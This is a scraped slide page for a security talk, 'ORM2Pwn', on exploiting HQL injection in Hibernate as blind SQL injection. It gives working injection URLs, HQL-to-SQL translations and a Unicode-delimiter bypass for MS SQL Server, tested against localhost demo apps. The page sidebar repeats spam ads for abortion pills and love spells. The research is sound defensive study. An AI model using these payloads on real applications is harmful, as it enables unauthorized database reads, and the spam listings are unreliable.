CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST API
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applications
 

Recently uploaded

%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benonimasabamasaba
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Bert Jan Schrijver
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in sowetomasabamasaba
 
WSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaSWSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaSWSO2
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationJuha-Pekka Tolvanen
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...masabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburgmasabamasaba
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2
 
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2
 

Recently uploaded (20)

%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security Program
 
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
WSO2CON 2024 - Building the API First Enterprise – Running an API Program, fr...
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
WSO2CON 2024 - Navigating API Complexity: REST, GraphQL, gRPC, Websocket, Web...
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
WSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaSWSO2CON 2024 Slides - Open Source to SaaS
WSO2CON 2024 Slides - Open Source to SaaS
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - Keynote
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 

ORM2Pwn: Exploiting injections in Hibernate ORM

  • 1. ORM2Pwn: Exploiting injections in Hibernate ORM Mikhail Egorov Sergey Soldatov
  • 2. Short BIO - Mikhail Egorov ▶ Application Security Engineer at Odin [ http://www.odin.com ] ▶ Security researcher and bug hunter ▶ Graduated from BMSTU with MSc. in Information Security [IU8] ▶ Holds OSCP and CISSP certificates ▶ See my blog [ http://0ang3el.blogspot.com ]
  • 3. Short BIO - Sergey Soldatov ▶ Chief infosecurity manager at big corp.’s IT insourcer • GRC  and “paper security” • Security engineer and systems architect • Security operations manager and analyst ▶ Amateur hacker security researcher & musician ▶ BMSTU’s IU8 ▶ CISA, CISSP ▶ http://reply-to-all.blogspot.ru/
  • 4. Motivation ▶ Modern applications work with DBMS not directly but via ORM ▶ In Java, Hibernate is a popular ORM [ Red Hat project ] ▶ Hibernate uses HQL, which is very limited [ versus SQL ] ▶ HQLi exploitation is limited 
  • 5. Motivation ▶ Is it possible to exploit HQLi as SQLi for popular DBMSs? ▶ MySQL, Postgresql, Oracle, MS SQL Server are popular [ in our opinion  ] Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
  • 6. Chuck Norris can exploit SQLi even on static HTML pages
  • 7. MySQL DBMS ▶ Hibernate escapes [‘] in string with [‘’] ▶ MySQL escapes [‘] in string with [’] ▶ Kudos to @_unread_ who disclosed this technique before our talk  • http://www.synacktiv.fr/ressources/hql2sql_sstic_2015_en.pdf
  • 8. MySQL DBMS  What about string ‘abc’’or 1=(select 1)--’?  Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string]  MySQL – ‘abc’’or 1=(select 1)--’
  • 9. MySQL DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%27%20or%201<length((select%20vers ion()))%20--%20  HQL query - SELECT p FROM pl.btbw.persistent.Post p where p.name=‘dummy’’ or 1<length((select version())) -- ’  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name=‘dummy’’ or 1<length((select version())) -- ’
  • 10. Postgresql DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  HQL allows subqueries in where clause  Hibernate allow arbitrary function names in HQL  Postgresql has nice built-in query_to_xml(‘SQL’)
  • 11. Postgresql DBMS  query_to_xml(‘SQL’) return XML [not usable directly ]  Nevertheless it is possible to know if the SQL return 0 rows or > 0 array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) array_upper(xpath('row',query_to_xml('select 1 where 1337<1', true, false,'')),1)
  • 12. Postgresql DBMS SQL returns 1 row [ or more ] SQL returns no rows
  • 13. Postgresql DBMS  Navigate to URL http://127.0.0.1:8080/hqli.playground/dummy%27%20and%20array_upper%28xpath%28%27row%27%2Cqu ery_to_xml%28%27select%201%20where%201337%3E1%27%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%2 0and%20%271%27%3D%271  HQL query SELECT p FROM hqli.persistent.Post p where p.name='dummy' and array_upper(xpath('row',query_to_xml('select 1 where 1337>1',true,false,'')),1)=1 and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and array_upper(xpath('row', query_to_xml('select 1 where 1337>1', true, false, '')), 1)=1 and '1'='1'
  • 14. Oracle DBMS  Trick with ’’ not working • Quote escaping with ‘’ [ not with ’ ]  Hibernate allow arbitrary function names in HQL  Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’)
  • 15. Oracle DBMS  DBMS_XMLGEN.getxml(‘SQL’) returns CLOB or null [ null if SQL returns no rows ]  It is possible to know if the SQL return 0 rows or > 0 using TO_CHAR and NVL built-ins NVL(TO_CHAR(DBMS_XMLGEN.getxml(‘SQL')),'1')!='1'
  • 16. Oracle DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20and%20NVL(TO_CHAR(DBMS_XMLGEN.getxml(%27SELECT%201337% 20FROM%20dual%20where%201337>1%27)),%271%27)!=%271%27%20and%20%271%27=%271  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')!='1' and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and NVL(to_char(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')), '1')<>'1' and '1'='1'
  • 17. Microsoft SQL Server DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  There are no usable functions like query_to_xml(‘SQL’)
  • 18. Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! ANTLR grammar for HQL parsing is here https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b0297f801daccfe85a9/hibernate-core/src/main/antlr/hql.g ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/
  • 19. Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! IDENT options { testLiterals=true; } : ID_START_LETTER ( ID_LETTER )* { // Setting this flag allows the grammar to use keywords as identifiers, if necessary. setPossibleID(true); } ; protected ID_START_LETTER : '_' | '$' | 'a'..'z' | 'u0080'..'ufffe' // HHH-558 : Allow unicode chars in identifiers ; protected ID_LETTER : ID_START_LETTER | '0'..'9' ;
  • 20. Microsoft SQL Server DBMS  MS SQL Server allows Unicode delimiters in query!!! There are many delimiters like space [U+0020] LEN(U(selectU(1)) [ U – Unicode delimiter ]  We’ve found them all with dumb Fuzzing!!!
  • 21. Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+00A0 %C2%A0 No-break space U+1680 %E1%9A%80 OGHAM SPACE MARK U+2000 %E2%80%80 EN QUAD U+2001 %E2%80%81 EM QUAD U+2002 %E2%80%82 EN SPACE U+2003 %E2%80%83 EM SPACE U+2004 %E2%80%84 THREE-PER-EM SPACE U+2005 %E2%80%85 FOUR-PER-EM SPACE U+2006 %E2%80%86 SIX-PER-EM SPACE U+2007 %E2%80%87 FIGURE SPACE U+2008 %E2%80%88 PUNCTUATION SPACE U+2009 %E2%80%89 Thin space
  • 22. Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+200A %E2%80%8A HAIR SPACE U+200B %E2%80%8B ZERO WIDTH SPACE U+2028 %E2%80%A8 LINE SEPARATOR U+2029 %E2%80%A9 PARAGRAPH SEPARATOR U+202F %E2%80%AF NARROW NO-BREAK SPACE U+205F %E2%81%9F Medium Mathematical space U+3000 %E3%80%80 Ideographic space
  • 23. Microsoft SQL Server DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20or%201%3CLEN%28%C2%A0%28select%C2%A0top%C2%A01%C2%A0una me%C2%A0from%C2%A0postusers%29%29%20or%20%2731%27=%27143999  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' or 1<LEN([U+00A0]( select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999' Hibernate sees here two function calls: Len and [U+00A0] Identifier select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers is passed as function argument  Resulting SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'
  • 24. Microsoft SQL Server DBMS select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999‘ Is the same as select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len(select top 1 uname from postusers)) or '31'='143999'
  • 25. Microsoft SQL Server DBMS: additional useful tricks Query fragment How to rewrite to full HQL Result where id=13 where id like 13 No “=“ where field=‘data’ where field like cast(0xDATA_IN_HEX as varchar) No “=“; No “ ’ “ where field not in (‘data1’, ‘data2’) where 0 like charindex(concat(‘+’,field,’+’), cast(0xDATA1DATA2_IN_HEX as varchar(MAX))) No list 0xDATA_IN_HEX smth_known_to_hibernate(..) U0xDATA_IN_HEX Usmth_known_to_hibernate(..) int || func  identifier substring((select…),N,1)=‘c’ N like charindex(‘c’, (select…), N) substring  charindex
  • 26. Hey, dude stop it! Show me the hack! Video - https://www.youtube.com/watch?v=m_MTWZptXUw All demo scripts are here - https://github.com/0ang3el/Hibernate-Injection-Study Vulnerable App - https://github.com/0ang3el/HQLi-playground
  • 27. Takeaways ▶ HQL injection is SQL injection [ exploit HQLi as bSQLi ] ▶ Hibernate is not a WAF ▶ Our exploitation technique works because: ▶ Hibernate allows arbitrary names for identifiers (function and argument names) ▶ Hibernate allows Unicode symbols in identifiers ▶ Hibernate escapes quotes [‘] in string by doubling them [‘’]